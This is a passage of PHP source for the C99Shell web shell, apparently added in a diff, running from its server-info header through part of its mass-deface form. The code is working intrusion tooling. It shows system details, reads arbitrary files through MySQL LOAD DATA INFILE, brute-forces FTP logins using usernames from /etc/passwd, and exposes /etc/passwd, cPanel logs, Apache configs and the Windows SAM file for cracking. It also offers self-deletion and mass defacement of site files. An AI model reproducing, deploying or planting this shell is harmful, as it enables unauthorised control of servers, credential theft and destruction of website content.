text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+echo "<b>Directory: </b>";
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=\"green\">[ ok ]</font>";
+ echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=\"red\">[ Read-Only ]</font>";
+ echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
+}
+$free = diskfreespace(realpath($d));
+$all = disk_total_space(realpath($d));
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":\\"))
+  {
+   if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
+   else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
+}
+?></p></td></tr></table><br><?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
+}
+?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    echo "<option value=\"\">Databases (...)</option>
+";
+    $c = 0;
+    while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  if ($sql_db)
+  {
+   echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+   echo "</b></center>";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($submit)
+    {
+     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    }
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtpl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    $set = array();
+    $set["sock"] = $sql_sock;
+    $set["db"] = $sql_db;
+    $dump_out = "print";               
+    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+    elseif ($dump_out == "download")
+    {
+     @ob_clean();
+     header("Content-type: c99shell");
+     header("Content-disposition: attachment; filename=\"".$f."\";"); 
+     $set["print"] = 1;
+     $set["nl2br"] = 1;
+    }
+    $set["file"] = $dump_file;
+    $set["add_drop"] = true;
+    $ret = mysql_dump($set);
+    if ($dump_out == "download") {exit;}
+   }
+   else
+   {
+    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+    echo "<tr>";
+    echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+    echo "<td><center><b>Table</b></center></td>";
+    echo "<td><b>Rows</b></td>";
+    echo "<td><b>Type</b></td>";
+    echo "<td><b>Created</b></td>";
+    echo "<td><b>Modified</b></td>";
+    echo "<td><b>Size</b></td>";
+    echo "<td><b>Action</b></td>";
+    echo "</tr>";
+    $i = 0;
+    $tsize = $trows = 0;
+    while ($row = mysql_fetch_array($result, MYSQL_NUM))
+    {
+     $tsize += $row["5"];
+     $trows += $row["5"];
+     $size = view_size($row["5"]);
+     echo "<tr>";
+     echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+     echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+     echo "<td>".$row[3]."</td>";
+     echo "<td>".$row[1]."</td>";
+     echo "<td>".$row[10]."</td>";
+     echo "<td>".$row[11]."</td>";
+     echo "<td>".$size."</td>";
+     echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+     echo "</tr>";
+     $i++;
+    }
+    echo "<tr bgcolor=\"000000\">";
+    echo "<td><center><b>»</b></center></td>";
+    echo "<td><center><b>".$i." table(s)</b></center></td>";
+    echo "<td><b>".$trows."</b></td>";
+    echo "<td>".$row[1]."</td>";
+    echo "<td>".$row[10]."</td>";
+    echo "<td>".$row[11]."</td>";
+    echo "<td><b>".view_size($tsize)."</b></td>";
+    echo "<td></td>";
+    echo "</tr>";
+    echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+    mysql_free_result($result);
+   }
+  }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstat","servervars","processes","getfile");
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+   }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    elseif (($sql_act == "getfile"))
+    {
+     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+     else
+     {
+      for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+      $f = ""; 
+      while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+      if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+      else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+     }
+     mysql_free_result($result);
+     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+     }
+    }
+   }
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  $fp = fopen("/etc/passwd","r");
+  if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+  else
+  {
+   ob_flush();
+   $i = $success = 0;
+   $ftpquick_st = getmicrotime();
+   while(!feof($fp))
+   { 
+    $str = explode(":",fgets($fp,2048));
+    $sock = ftp_connect("localhost",21,1);
+    if (ftp_login($sock,$str[0],$str[0]))
+    {
+     echo "<a href=\"ftp://".$str[0].":".$str[0]."@".$SERVER_NAME."\" target=\"_blank\"><b>Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"</b></a>.<br>";
+     ob_flush();
+     $success++;
+    }
+    if ($i > $nixpwdperpage) {break;}
+    $i++;
+   }
+   if ($success == 0) {echo "No success. connections!";}
+   $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+   echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+  }
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Server security information:</b></center>";
+ echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+ echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+   "text"=>$text, "text_regexp"=>$text_regxp,
+   "text_wwo"=>$deface_text_wwo,
+   "text_cs"=>$deface_text_cs,
+   "text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+   if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;}
+   else {$ls_arr = $found;}
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+  if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
